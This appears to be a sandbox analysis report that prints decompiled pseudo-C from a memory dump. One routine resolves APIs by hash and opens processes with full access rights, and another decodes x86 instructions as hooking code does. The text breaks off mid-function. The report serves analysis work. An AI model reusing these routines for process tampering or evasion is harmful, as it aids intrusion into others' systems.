Instruction ID: 00802be3918ea6aeb11fe45908ae931f8062d9273d37329102aa76dba10a21a3
Opcode Fuzzy Hash: f6d1a7add298286a0714c8aa5ddbbd6a669f41b2ea832ff541077008ae5bfe0a
Instruction Fuzzy Hash: 60128C755082019FE714DF24C882A6FB7E5FFC5394F108A2DF899972AADB30AC45DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1000846C, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1000846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E1000B69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E1000F4F4(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E1000F678(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E1001223C(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E1000F678(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E1000F5A8(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E1000F5A8(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E1000F4E0(_t449 + 0x14, 0);
									_t180 = E10012928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E1000B608(_t449 + 0x34);
										E1000B608(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E1000F4E0( *(_t449 + 4), _t315 << 2)));
										_t188 = E1000F4E0( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E1000B608(_t449 + 0x34);
										E1000B608(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E1000CAD0(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E1000C2C4(_t343);
									if(__eflags != 0) {
										break;
									}
									E1000F84C(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E1000F4E0(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E1001303C(0xfe338407, 0xa8c8a645);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E1000F84C(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 4);
											 *(E1000F4E0(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E1000CD68(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E1000F4E0( *(_t449 + 4), _t431 * 4);
												_t212 = E1000F4E0(_t449 + 0x40, _t431 * 4);
												E10008B9C( *_t211, E100102D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E1000CD68(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E1000F4E0(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E1000F4F0( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E1000F4F0( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E1000F4E0( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E1000F4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E100138C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E1000F4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E1000F4F0(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E1000F4F0(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E1000F4E0(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E1000F4E0(_t322, _t430);
										E100138C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E1000F4F0(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E1000F84C(_t322, E1000F4F0(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
								 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E1000F84C(_t322, E1000F4F0(_t322) + 4);
								 *(E1000F4E0(_t322, E1000F4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E1000F4E0(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E1001303C(0x10154545, 0xc2a75cb8);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
										 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E1000F84C( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E1000F4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E1000F4E0( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E1000F4F0( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E1000F4F0(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E1000F4E0(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E1000F4E0(_t430, _t443);
										E100138C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E1000F4F0(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E1000F84C(_t430, E1000F4F0(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E1001303C(0xfe338407, 0x77fa1d17);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E1000F4F0( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E1000F4F0( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E1000F4E0( *(_t449 + 4), _t445);
										E100138C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E1000F4F0( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E1000F4E0(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x10008479
0x1000847f
0x10008483
0x10008487
0x10008492
0x10008496
0x1000849b
0x100084a3
0x100084b3
0x00000000
0x100084b5
0x100084bd
0x100084c4
0x100084c4
0x10008a17
0x10008a19
0x10008a5a
0x10008a5c
0x10008a6b
0x10008a77
0x10008a77
0x10008a66
0x10008a7d
0x10008a82
0x00000000
0x10008a82
0x10008a6a
0x00000000
0x100084ce
0x100084d2
0x100084d5
0x100085dd
0x100085dd
0x100085e2
0x10008705
0x10008709
0x1000870e
0x10008712
0x10008716
0x1000884c
0x1000884e
0x10008852
0x1000885b
0x10008866
0x1000886a
0x10008873
0x10008878
0x1000887e
0x1000887f
0x10008883
0x10008887
0x1000888e
0x10008890
0x100089d0
0x100089e1
0x100089e8
0x100089ef
0x100089ef
0x100089f2
0x100089f5
0x100089f8
0x100089fe
0x10008a05
0x10008a09
0x10008a12
0x00000000
0x10008a12
0x10008a00
0x10008a03
0x10008a1c
0x10008a34
0x10008a37
0x10008a3c
0x10008a46
0x10008a49
0x10008a4c
0x10008a55
0x00000000
0x10008a55
0x00000000
0x10008a03
0x10008898
0x10008898
0x1000889a
0x1000889e
0x100088a3
0x100088a5
0x100088a9
0x100088ac
0x100088b4
0x100088b6
0x00000000
0x00000000
0x100088cd
0x100088e8
0x100088ea
0x100088f8
0x100088fd
0x100088ff
0x1000891c
0x1000891c
0x10008920
0x10008922
0x00000000
0x00000000
0x10008924
0x10008927
0x10008948
0x10008967
0x1000896d
0x10008970
0x10008975
0x10008976
0x1000897d
0x00000000
0x00000000
0x10008985
0x10008985
0x10008987
0x10008993
0x1000899f
0x100089c1
0x100089c6
0x100089c7
0x100089c7
0x00000000
0x10008987
0x00000000
0x10008927
0x10008901
0x10008907
0x10008909
0x1000890a
0x1000890b
0x1000890c
0x10008910
0x10008914
0x10008916
0x10008917
0x10008918
0x1000891a
0x00000000
0x00000000
0x00000000
0x1000891a
0x1000892d
0x00000000
0x1000892d
0x1000871c
0x1000871e
0x10008720
0x00000000
0x00000000
0x1000872a
0x1000872a
0x1000872c
0x1000872f
0x10008731
0x10008739
0x10008740
0x10008744
0x10008747
0x00000000
0x00000000
0x10008843
0x10008844
0x10008846
0x00000000
0x00000000
0x00000000
0x10008846
0x1000874d
0x10008750
0x10008759
0x1000875e
0x10008760
0x1000876c
0x10008770
0x10008775
0x10008779
0x10008b56
0x10008b6a
0x10008b8c
0x10008b91
0x10008b91
0x1000878f
0x10008794
0x10008798
0x10008798
0x10008798
0x10008798
0x1000879d
0x100087a2
0x100087a4
0x100087a8
0x100087af
0x100087b4
0x100087b6
0x10008b17
0x10008b26
0x10008b3f
0x10008b44
0x10008b44
0x100087c9
0x100087ce
0x100087d2
0x100087d2
0x100087d2
0x100087e4
0x10008805
0x1000880d
0x1000881b
0x10008839
0x1000883f
0x1000883f
0x00000000
0x10008750
0x100085e8
0x100085e8
0x100085ea
0x100085f1
0x100085ff
0x10008601
0x10008605
0x10008607
0x10008609
0x10008644
0x10008653
0x10008655
0x10008657
0x10008675
0x10008677
0x10008679
0x1000868b
0x100086a9
0x100086b2
0x100086b5
0x100086c3
0x100086d4
0x100086f2
0x100086f4
0x100086f8
0x100086f8
0x100086f8
0x10008679
0x00000000
0x10008657
0x1000860f
0x1000860f
0x10008614
0x1000861b
0x1000862a
0x10008631
0x10008633
0x00000000
0x00000000
0x1000863f
0x10008640
0x10008642
0x00000000
0x00000000
0x00000000
0x10008642
0x10008635
0x10008638
0x00000000
0x00000000
0x100086fa
0x100086fa
0x100086fb
0x100086fb
0x00000000
0x100084db
0x100084db
0x100084db
0x100084dd
0x100084e4
0x100084f2
0x100084f4
0x100084f8
0x100084fa
0x10008526
0x1000852a
0x1000852f
0x10008534
0x10008538
0x1000853c
0x10008543
0x10008548
0x1000854a
0x10008ad9
0x10008ae8
0x10008b07
0x10008b0c
0x10008b0c
0x1000855d
0x10008562
0x10008566
0x10008566
0x10008566
0x10008577
0x10008579
0x1000857b
0x1000858c
0x1000858c
0x10008591
0x10008596
0x1000859a
0x1000859f
0x100085a6
0x100085ab
0x100085ad
0x10008a9b
0x10008aa7
0x10008ac1
0x10008ac6
0x10008ac6
0x100085c3
0x100085c8
0x100085cc
0x100085cc
0x100085cc
0x100085cc
0x100085cf
0x100085cf
0x00000000
0x100085cf
0x100084fe
0x100084fe
0x10008500
0x1000850c
0x10008513
0x10008515
0x00000000
0x00000000
0x10008521
0x10008522
0x10008524
0x00000000
0x00000000
0x00000000
0x10008524
0x10008517
0x1000851a
0x00000000
0x00000000
0x100085d0
0x100085d4
0x100085d5
0x100085d5
0x00000000
0x100084dd
0x100084d5

Strings

, xrefs: 10008A5E

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ed20a271df3380407315c2fa232c18c10c5b7ef6633770021337d75abb034d7e
Instruction ID: 1bb0d61435caef0e58cc5acfc0dead8aa63cbeb4aacce1040875febecc2d3119
Opcode Fuzzy Hash: ed20a271df3380407315c2fa232c18c10c5b7ef6633770021337d75abb034d7e
Instruction Fuzzy Hash: 76126C752083049FE714DF24C981A6FB7E5FF85784F10892DF999872AAEB30AD04DB42

Uniqueness

Uniqueness Score: -1.00%

Function 10019348, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10019348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E10013670( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
